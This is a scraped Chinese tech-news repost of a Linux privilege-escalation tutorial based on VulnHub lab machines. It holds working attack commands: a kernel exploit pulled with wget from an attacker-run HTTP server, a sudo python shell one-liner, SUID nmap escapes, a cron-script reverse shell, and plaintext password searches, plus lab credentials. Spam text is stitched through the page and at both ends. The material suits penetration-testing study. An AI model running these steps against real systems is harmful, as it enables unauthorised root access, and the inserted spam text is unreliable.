日韩成人免费在线_国产成人一二_精品国产免费人成电影在线观..._日本一区二区三区久久久久久久久不

當前位置:首頁 > 科技  > 軟件

Linux提權過程中的各種姿勢

來源: 責編: 時間:2024-01-15 17:12:24 293觀看
導讀1.關于提權系統提權通常是滲透測試或CTF比賽中遇到的關鍵步驟, 通過提權可以允許攻擊者執行一些特殊操作,例如:繞過訪問控制、更改密碼、創建新用戶作為持久化手段、對軟件進行更改等。具有root權限的用戶則可以對系

KT128資訊網——每日最新資訊28at.com

1.關于提權

KT128資訊網——每日最新資訊28at.com

系統提權通常是滲透測試或CTF比賽中遇到的關鍵步驟, 通過提權可以允許攻擊者執行一些特殊操作,例如:繞過訪問控制、更改密碼、創建新用戶作為持久化手段、對軟件進行更改等。具有root權限的用戶則可以對系統進行任何操作, 包括:讀、寫或刪除任何文件、停止或啟動服務、安裝或卸載應用程序及管理賬戶等。KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

2.提權過程中的信息收集

KT128資訊網——每日最新資訊28at.com

提權過程中的信息收集相當于是一個手動枚舉的過程, 涉及對系統配置和服務信息進行詳細的查看和收集, 在此過程中, 往往需要記錄盡可能多的信息, 其中有些看似不重要的信息即使現在用不到, 在后期往往能提供非常有價值的靈感和思路。KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

2.1 查看系統內核版本

KT128資訊網——每日最新資訊28at.com

如果發現具有可用漏洞的內核版本, 則可以使用它來獲取root shell, 可以使用以下命令查看內核版本:KT128資訊網——每日最新資訊28at.com

$ uname -r

命令返回如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

如果安裝了LSB模塊, 則可以使用命令查看Linux版本, 命令如下:KT128資訊網——每日最新資訊28at.com

$ lsb_release -a

假如沒有該命令, 可以使用以下命令查看:KT128資訊網——每日最新資訊28at.com

$ cat /proc/version

命令返回結果如下:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

2.2 Sudo版本

KT128資訊網——每日最新資訊28at.com

跟內核版本一樣, sudo版本也可能受到攻擊, 可以使用以下命令查看:KT128資訊網——每日最新資訊28at.com

$ sudo -V

命令返回結果如下:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

2.3 歷史記錄

KT128資訊網——每日最新資訊28at.com

使用history命令可以查看系統曾經運行的命令歷史記錄, 在這個過程中往往能夠找到一些有價值的信息,例如:系統密碼,如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

2.4 計劃任務

KT128資訊網——每日最新資訊28at.com

可以使用命令查看系統中間隔時間運行的程序, 在這個過程中可能會發現一些意外的信息,如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

2.5 sudo信息

KT128資訊網——每日最新資訊28at.com

在Linux權限提升過程中, 查看用戶當前擁有的sudo權限, 可以提示我可能使用sudo能夠運行某些命令, 輸入以下命令:KT128資訊網——每日最新資訊28at.com

$ sudo -l

命令返回結果如下:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

2.6 檢查身份

KT128資訊網——每日最新資訊28at.com

可以直接使用id命令查看當前用戶屬于哪些組, 如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

2.7 檢查網絡信息

KT128資訊網——每日最新資訊28at.com

查看網絡信息可以為下一步行動提供豐富的信息,例如: 路由信息、IP地址等, 根據這些信息對于之后理清整個網絡拓撲結構非常有幫助, 命令執行結果如下:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

3.自動化工具

KT128資訊網——每日最新資訊28at.com

在Linux系統中使用自動化工具可以大大提升整體效率, 以下是一些常見的枚舉工具。KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

3.1 LinEnum

KT128資訊網——每日最新資訊28at.com

LinEnum是一款流行的權限提升工具, 它能夠顯示有關Linux系統的信息, 這些信息有價值的地方在于它們可能具有潛在的漏洞、錯誤配置, 大大提高提權的成功幾率。KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

LinEnum收集的信息包括:用戶賬戶、文件權限、活動進程、已安裝的軟件包、網絡配置、計劃任務、系統日志、版本信息等。KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

3.2 LinPEAS

KT128資訊網——每日最新資訊28at.com

LinPEAS也是一個流行的提權腳本, 可以幫助我生成root shell的潛在路徑, 并協助發現Linux環境中權限的錯誤配置或漏洞。KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

LinPEAS使用顏色編碼系統突出顯示哪些特權升級維度最可能發揮作用, 如果出現紅色/黃色, 則應該優先關注。KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

3.3 Pspy工具

KT128資訊網——每日最新資訊28at.com

Pspy是一個命令行工具, 該工具可以無需root權限監控Linux系統中運行的進程。KT128資訊網——每日最新資訊28at.com

該工具對于識別cron作業或其他計劃任務運行的進程特別有用, 這些進程通常是特權升級攻擊的目標。通過識別這些進程,滲透測試人員可以找到利用錯誤配置或漏洞的機會,從而使攻擊者能夠在系統上獲得更高的權限。KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

3.4 Linux Exploit Suggester

KT128資訊網——每日最新資訊28at.com

Linux Exploit Suggester是一個Linux權限提升工具,用于檢查計算機是否存在潛在的內核漏洞。該工具使用“極有可能”、“可能”、“不太可能”和“不可能”分數來計算漏洞利用成功的可能性。KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

3.5 Linux Smart Enumeration

KT128資訊網——每日最新資訊28at.com

Linux Smart Enumeration是另一個類似于LinPEAS 的工具。它旨在識別系統漏洞、錯誤配置和其他潛在的系統權限升級途徑。然而,LSE以其獨特的檢查“級別”而聞名,它允許用戶根據自己的需要指定枚舉的深度。KT128資訊網——每日最新資訊28at.com

它具有三個詳細級別。默認情況下,系統會顯示最嚴重的安全漏洞。執行第1級會顯示有用的信息,可以幫助滲透測試人員升級權限。執行級別2將提供收集的所有系統數據的大量轉儲。KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

4.利用內核漏洞提權

KT128資訊網——每日最新資訊28at.com

內核漏洞是利用Linux操作系統內核代碼中的錯誤或缺陷, 例如:緩沖區溢出。為了能夠證明利用內核漏洞提升權限并生成root shell確實有效, 這里使用了VulnHub的Kioptrix 1.1虛擬機。KT128資訊網——每日最新資訊28at.com

當以普通用戶進入目標機器后, 首先還是通過lsb_release -a 命令查看內核版本, 如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

從上圖中可以看出, 這臺機器運行的是CentOS, 內核版本為:2.6.9, 下一步使用searchsploit命令查找漏洞, 完整命令如下:KT128資訊網——每日最新資訊28at.com

$ searchsploit linux CentOS 2.6 privilege escalation

圖片KT128資訊網——每日最新資訊28at.com

上圖中顯示的9545.c將是我們利用的目標, 但必須將代碼從Kali傳輸到我的目標機器并編譯成可執行文件。KT128資訊網——每日最新資訊28at.com

接下來我在Kali機器上啟動一個Python服務器, 并通過Kioptrix 機器上的wget下載漏洞利用程序。以下命令將在端口 8000 上啟動 Python 服務器。確保在漏洞所在的同一文件夾中啟動服務器。KT128資訊網——每日最新資訊28at.com

python3 -m http.server

圖片圖片KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

下面我可以使用wget命令將漏洞利用程序下載到Kioptrix,命令如下:KT128資訊網——每日最新資訊28at.com

wget http://192.168.56.103:8000/9545.c

下載完成后, 使用以下命令編譯代碼:KT128資訊網——每日最新資訊28at.com

gcc 9545.c -o privesc

圖片圖片KT128資訊網——每日最新資訊28at.com

最終利用內核漏洞獲取到root shell權限。KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

5.利用服務漏洞提權

KT128資訊網——每日最新資訊28at.com

服務漏洞主要是利用系統或應用程序服務中的漏洞達到提權目的。這些服務通常是向其他程序或用戶提供特定功能的后臺程序,包括: Web服務器、數據庫服務器、電子郵件服務器等。KT128資訊網——每日最新資訊28at.com

服務漏洞利用的過程涉及攻擊者控制服務中的漏洞個來執行惡意代碼, 根據具體的漏洞和所涉及的服務, 成功利用的結果可能會有很大差異。KT128資訊網——每日最新資訊28at.com

下面是一個利用的案例, 看看在VulnHub的Raven2 VM中利用服務漏洞進行root訪問是一種怎樣的體驗。KT128資訊網——每日最新資訊28at.com

當我通過反彈shell進入了目標系統, 便可以進行一些枚舉操作來查找任何潛在的漏洞。KT128資訊網——每日最新資訊28at.com

現在我已經擁有位于wp_config文件中的MySQL憑據, 接著運行LinPeas工具, 看看能否找到任何可能的特權路徑。KT128資訊網——每日最新資訊28at.com

觀察LinPeas提供的輸出內容, 我發現MySQL正在以root身份運行, 如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

祭出搜索引擎, 看看該版本的MySQL是否有可用的漏洞,如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

看上去運氣不錯, 有一個名為udf_root的潛在的權限提升服務漏洞可以利用,該漏洞利用MySQL中的UDF(用戶定義函數是一段擴展MySQL服務器功能代碼)以MySQL服務的權限執行系統命令, 最終獲取系統權限。KT128資訊網——每日最新資訊28at.com

該漏洞利用會將/bin/sh復制到臨時文件夾, 將所有者設置為root, 然后在/bin/sh二進制文件中設置SUID權限, 從而提供root shell。KT128資訊網——每日最新資訊28at.com

將udf_root腳本下載到我本地Kali機器上, 將其重命名為ravenprivesc.py, 通過執勤啟動的Python服務器并使用wget命令將其下載到Raven機器上, 如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

結合之前MySQL的登錄憑據, 即:用戶名:root, 密碼:R@v3nSecurity, 運行一下試試:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

成功獲取到root權限。KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

6.利用Sudo權限提權

KT128資訊網——每日最新資訊28at.com

在Linux系統中, sudo代表超級用戶執行操作, 該命令允許普通用戶以超級用戶(root)的安全權限執行某些命令。sudo的主要目的是將root權限限制在真正需要的時候。KT128資訊網——每日最新資訊28at.com

對于攻擊者來說, 利用sudo規則, 可以獲得提權并操作一些命令,例如: cat、find或python。KT128資訊網——每日最新資訊28at.com

下面我使用sudo -l命令來查看sudo權限:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

從上圖中可以看出, 可以使用sudo權限運行python, 而無需提供密碼。KT128資訊網——每日最新資訊28at.com

下面執行該命令:KT128資訊網——每日最新資訊28at.com

sudo python -c 'import os; os.system("/bin/sh")'

圖片圖片KT128資訊網——每日最新資訊28at.com

從上圖看到,直接獲取到了root權限。KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

7.利用SUID提權

KT128資訊網——每日最新資訊28at.com

SUID代表設置所有者用戶ID, SUID允許用戶以與文件所有者相同的權限運行可執行文件。例如:如果文件設置了SUID位, 則標準用戶可以使用root權限執行該文件。KT128資訊網——每日最新資訊28at.com

SUID權限可以使用帶有四個前綴的chmod命令(例如:chmod 4755 文件名)來設置, 并且可以在ls -l中用s代替用戶執行權限。KT128資訊網——每日最新資訊28at.com

可以輸入以下命令進行手動檢查SUID:KT128資訊網——每日最新資訊28at.com

find / -type f -perm -04000 -ls 2>/dev/null

圖片圖片KT128資訊網——每日最新資訊28at.com

也可以使用LinPeas檢查SUID文件,如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

如上圖, 利用Nmap命令設置SUID位來幫助我提升權限。可以從這個網站:https://gtfobins.github.io/gtfobins/nmap/#suid找到相關操作的詳細過程。KT128資訊網——每日最新資訊28at.com

使用--interactive標志運行Nmap將來交互模式下啟動它, 而!sh會在交互模式下生成一個shell, 由于Nmap上設置了SUID位, 因此shell將以root權限運行。KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

8.計劃任務提權

KT128資訊網——每日最新資訊28at.com

Linux中的計劃任務是按預定義的時間或間隔運行的操作, 它們用于自動執行重復性任務, 以便無需人工干預即可完成這些任務。KT128資訊網——每日最新資訊28at.com

如果計劃任務以更高權限運行, 例如:root cron作業, 并且如果它被錯誤配置為執行普通用戶可寫的文件或腳本, 這樣就可以修改此文件或腳本來包含惡意命令, 從而導致權限升級計劃任務執行。KT128資訊網——每日最新資訊28at.com

這里我采用了VulnHub中的Symfonos3 VM來查看計劃任務, 首先還是利用Python創建一個http服務,輸入命令:KT128資訊網——每日最新資訊28at.com

python3 -m http.server

圖片圖片KT128資訊網——每日最新資訊28at.com

這里可以使用wget命令從服務器下載pspy, 只要確保使用本機IP 即可:KT128資訊網——每日最新資訊28at.com

wget http://192.168.110.136:8000/pspy64

圖片圖片KT128資訊網——每日最新資訊28at.com

接著運行:./pspy64, 讓pspy運行幾分鐘, 這時可以看到一個名為ftpclient.py的進程在定時運行, 如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

研究一下該文件, 看看是否可以以某種方式在它后面附加一些代碼來生成反彈Shell,如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

這里我沒有ftpclient.py文件的寫入權限, 但我注意到該文件正在導入ftplib, 不妨嘗試將其寫入該文件中試試,如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

由于是"gods"組的一部分,因此擁有該文件的讀寫權限, 我可以給這個文件附加一個shell, 等待計劃任務執行, 這時應該稱為root用戶了, 如圖:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

回到kali機器上,看看結果:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

KT128資訊網——每日最新資訊28at.com

9.利用密碼提權

KT128資訊網——每日最新資訊28at.com

當涉及到Linux權限提升時, 成為root用戶最簡單的方法之一就是查找密碼, 攻擊者可能會使用多種方法來查找系統中的密碼。KT128資訊網——每日最新資訊28at.com

Linux用戶可以以純文本形式存儲密碼, 如果這些文件沒有得到適當保護, 攻擊者可能會訪問用戶的賬戶。KT128資訊網——每日最新資訊28at.com

一旦找到密碼, 攻擊者就可以使用它來提升權限, 方法是登錄更高權限的賬戶或將其與sudo一起使用以提升權限運行命令。KT128資訊網——每日最新資訊28at.com

下面將使用VulnHub中的SickOS VM來實現這個場景, 首先輸入以下命令查看密碼:KT128資訊網——每日最新資訊28at.com

cat /etc/passwd

圖片圖片KT128資訊網——每日最新資訊28at.com

從圖中可以看到, 有一個用戶較sickos, 下一步搜索以純文本形式存儲的密碼, 可以使用以下命令來搜索包含字符串"pass"的PHP文件:KT128資訊網——每日最新資訊28at.com

find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C 3 -i pass

圖片圖片KT128資訊網——每日最新資訊28at.com

可以看到, 有一個以明文形式存儲的用戶名root和密碼john@123, 看看是否可以使用找到的密碼切換到sickos用戶, 從社會工程學角度, 密碼往往會重復用于多種場合:KT128資訊網——每日最新資訊28at.com

圖片圖片KT128資訊網——每日最新資訊28at.com

居然可以, 我已將www-data用戶提升為Sickos用戶, 現在順便看看是否有sudo權限:KT128資訊網——每日最新資訊28at.com

sudo -l

圖片圖片KT128資訊網——每日最新資訊28at.com

可以看到,已經可以以root用戶身份運行所有命令。KT128資訊網——每日最新資訊28at.com

本文鏈接:http://m.www897cc.com/showinfo-26-61912-0.htmlLinux提權過程中的各種姿勢

聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。郵件:2376512515@qq.com

上一篇: 谷歌裁員千人,攪動硅谷!終身編程終結,我們何以茍活?

下一篇: 蘋果官網官宣新春降價活動 網友對比發現京東 iPhone 15 現貨比官網便宜 300 元

標簽:
  • 熱門焦點
  • Find N3入網:最高支持16+1TB

    OPPO將于近期登場的Find N3折疊屏目前已經正式入網,型號為PHN110。本次Find N3在外觀方面相比前兩代有很大的變化,不再是小號的橫向折疊屏,而是跟別的廠商一樣采用了較為常見的
  • 6月iOS設備性能榜:M2穩居榜首 A系列只能等一手3nm來救

    沒有新品發布,自然iOS設備性能榜的上榜設備就沒有什么更替,僅僅只有跑分變化而產生的排名變動,畢竟蘋果新品的發布節奏就是這樣的,一年下來也就幾個移動端新品,不會像安卓廠商,一
  • Java NIO內存映射文件:提高文件讀寫效率的優秀實踐!

    Java的NIO庫提供了內存映射文件的支持,它可以將文件映射到內存中,從而可以更快地讀取和寫入文件數據。本文將對Java內存映射文件進行詳細的介紹和演示。內存映射文件概述內存
  • 分享六款相見恨晚的PPT模版網站, 祝你做出精美的PPT!

    1、OfficePLUSOfficePLUS網站旨在為全球Office用戶提供豐富的高品質原創PPT模板、實用文檔、數據圖表及個性化定制服務。優點:OfficePLUS是微軟官方網站,囊括PPT模板、Word模
  • 虛擬鍵盤 API 的妙用

    你是否在遇到過這樣的問題:移動設備上有一個固定元素,當激活虛擬鍵盤時,該元素被隱藏在了鍵盤下方?多年來,這一直是 Web 上的默認行為,在本文中,我們將探討這個問題、為什么會發生
  • 2納米決戰2025

    集微網報道 從三強爭霸到四雄逐鹿,2nm的廝殺聲已然隱約傳來。無論是老牌勁旅臺積電、三星,還是誓言重回先進制程領先地位的英特爾,甚至初成立不久的新
  • OPPO K11評測:旗艦級IMX890加持 2000元檔最強影像手機

    【Techweb評測】中端機型用戶群體巨大,占了中國目前手機市場的大頭,一直以來都是各手機品牌的“必爭之地”,其中OPPO K系列機型一直以來都以高品質、
  • 最薄的14英寸游戲筆記本電腦 Alienware X14已可以購買

    2022年1月份在國際消費電子展(CES2022)上首次亮相的Alienware新品——Alienware X14現在已經可以購買了,這款筆記本電腦被譽為世界上最薄的 14 英寸游戲筆
  • 中關村論壇11月25日開幕,15位諾獎級大咖將發表演講

    11月18日,記者從2022中關村論壇新聞發布會上獲悉,中關村論壇將于11月25至30日在京舉行。本屆中關村論壇由科學技術部、國家發展改革委、工業和信息化部、國務
Top 日韩成人免费在线_国产成人一二_精品国产免费人成电影在线观..._日本一区二区三区久久久久久久久不
91久久精品一区二区别| 麻豆精品在线播放| 亚洲国产你懂的| 91久久综合| 夜夜爽www精品| 亚洲欧美激情视频在线观看一区二区三区 | 国产精品福利av| 国产精品永久免费观看| 黄色一区二区三区四区| 亚洲国产另类久久精品| 亚洲视频你懂的| 久久精品一区四区| 欧美精品少妇一区二区三区| 国产精品久久久久久久app| 国产一区二区剧情av在线| 亚洲国产精品一区二区www在线| 一本一本久久a久久精品综合妖精| 新狼窝色av性久久久久久| 欧美ed2k| 国产精品一区二区三区久久| 亚洲电影在线看| 亚洲影院免费观看| 久久激情婷婷| 欧美日韩免费观看一区二区三区 | 久久国产精品99国产精| 欧美激情一区二区久久久| 国产精品一区二区你懂的| 亚洲国产精品一区二区尤物区| 亚洲午夜精品久久久久久浪潮 | 99re6热只有精品免费观看 | 欧美人牲a欧美精品| 国产欧美一区二区在线观看| 亚洲人成网在线播放| 欧美在线看片| 欧美色道久久88综合亚洲精品| 国产日韩亚洲欧美综合| 99这里有精品| 久久手机免费观看| 欧美视频精品在线观看| 在线欧美三区| 欧美一区二视频| 欧美日韩黄色大片| 亚洲国产成人av| 欧美在线观看你懂的| 国产精品白丝av嫩草影院| 91久久国产综合久久蜜月精品| 欧美一区二区免费| 国产精品第三页| 日韩亚洲一区二区| 欧美1区3d| 精品动漫一区| 欧美在线视频二区| 国产精品久久91| 99精品欧美一区二区三区综合在线| 久久青草久久| 国产一区二区三区网站| 午夜精品一区二区三区在线视| 欧美日韩成人网| 亚洲高清不卡在线观看| 久久九九热re6这里有精品| 国产精品免费视频xxxx| 在线视频亚洲一区| 欧美另类变人与禽xxxxx| 亚洲国产成人精品久久| 久久久久久亚洲精品不卡4k岛国| 国产女主播一区二区三区| 亚洲午夜视频在线| 欧美日韩中文字幕在线| 亚洲精品视频免费| 欧美成人激情在线| 亚洲二区在线视频| 久久嫩草精品久久久久| 狠狠色丁香久久综合频道| 久久岛国电影| 国模一区二区三区| 久久精品盗摄| 国内一区二区三区在线视频| 久久av免费一区| 国产日韩欧美在线观看| 亚洲欧美在线免费观看| 国产精品久久久一区二区| 亚洲社区在线观看| 国产精品福利av| 亚洲免费网站| 国产精品午夜电影| 午夜精品亚洲| 国产日韩一区二区三区在线播放| 午夜视频在线观看一区| 国产精品一区二区久久| 先锋影音久久| 国产一区二区三区视频在线观看| 午夜在线观看欧美| 亚洲一区二区三区视频播放| 欧美视频在线观看免费网址| 亚洲午夜视频在线观看| 国产精品免费久久久久久| 亚洲欧美怡红院| 国产视频综合在线| 久久先锋资源| 91久久久久| 欧美日韩激情小视频| 亚洲午夜精品一区二区三区他趣 | 今天的高清视频免费播放成人 | 国产精品久久二区| 欧美一区二区三区视频免费| 国产在线观看一区| 麻豆av一区二区三区| 亚洲精品乱码视频| 欧美午夜片在线观看| 午夜亚洲视频| 红桃视频成人| 欧美激情精品久久久| 制服丝袜亚洲播放| 国产亚洲在线| 欧美成人激情视频| 亚洲午夜av在线| 国产在线精品二区| 欧美激情1区2区3区| 亚洲一级一区| 黄色成人在线| 欧美日韩不卡在线| 午夜老司机精品| 亚洲国产高清视频| 国产精品成人免费精品自在线观看| 性欧美长视频| 亚洲精品乱码久久久久| 国产酒店精品激情| 免费成人av资源网| 亚洲一级二级| ●精品国产综合乱码久久久久| 欧美日韩视频在线| 久久久久久亚洲精品杨幂换脸| 99精品视频免费| 国精产品99永久一区一区| 欧美精品国产精品| 欧美在线看片| 日韩亚洲欧美在线观看| 国产日韩欧美中文| 欧美日韩国产一区二区三区地区| 欧美一区二区免费观在线| 最新国产の精品合集bt伙计| 国产伦精品一区二区三区免费迷| 欧美xart系列高清| 亚洲欧洲av一区二区三区久久| 亚洲国产成人av在线| 国产乱码精品一区二区三区不卡| 免费在线亚洲欧美| 欧美在线视频导航| 一区二区三区高清在线| 揄拍成人国产精品视频| 国产精品久久久久久久7电影 | 国产午夜一区二区三区| 欧美精品在线网站| 久久精品网址| 亚洲综合二区| 亚洲品质自拍| 激情丁香综合| 国产精品乱码一区二区三区| 欧美成人在线免费观看| 久久国产直播| 亚洲午夜未删减在线观看| 最新69国产成人精品视频免费| 国产亚洲精品v| 欧美婷婷久久| 欧美不卡激情三级在线观看| 久久av最新网址| 亚洲综合999| 99热在线精品观看| 在线观看欧美激情| 国产亚洲精久久久久久| 国产精品免费一区二区三区观看| 欧美极品欧美精品欧美视频| 久久久亚洲午夜电影| 午夜精品亚洲| 亚洲你懂的在线视频| 日韩视频在线观看一区二区| 精品91在线| 国产自产v一区二区三区c| 国产农村妇女毛片精品久久莱园子| 欧美日韩一区二区三区在线看 | 好吊妞**欧美| 国产网站欧美日韩免费精品在线观看| 欧美特黄a级高清免费大片a级| 欧美二区在线| 免费看亚洲片| 麻豆国产精品va在线观看不卡| 欧美在线视频日韩| 午夜精品免费视频| 亚洲欧美在线视频观看| 亚洲女同性videos| 亚洲一区综合| 亚洲自拍都市欧美小说| 亚洲天堂成人在线观看| 一区二区电影免费观看| 99国产欧美久久久精品| 日韩视频在线一区二区三区| 亚洲欧洲日产国码二区| 亚洲激情女人| 亚洲国产日韩一级| 亚洲高清不卡在线观看| 亚洲国产导航| 亚洲麻豆一区| 一本综合久久| 亚洲一区二区三区在线视频|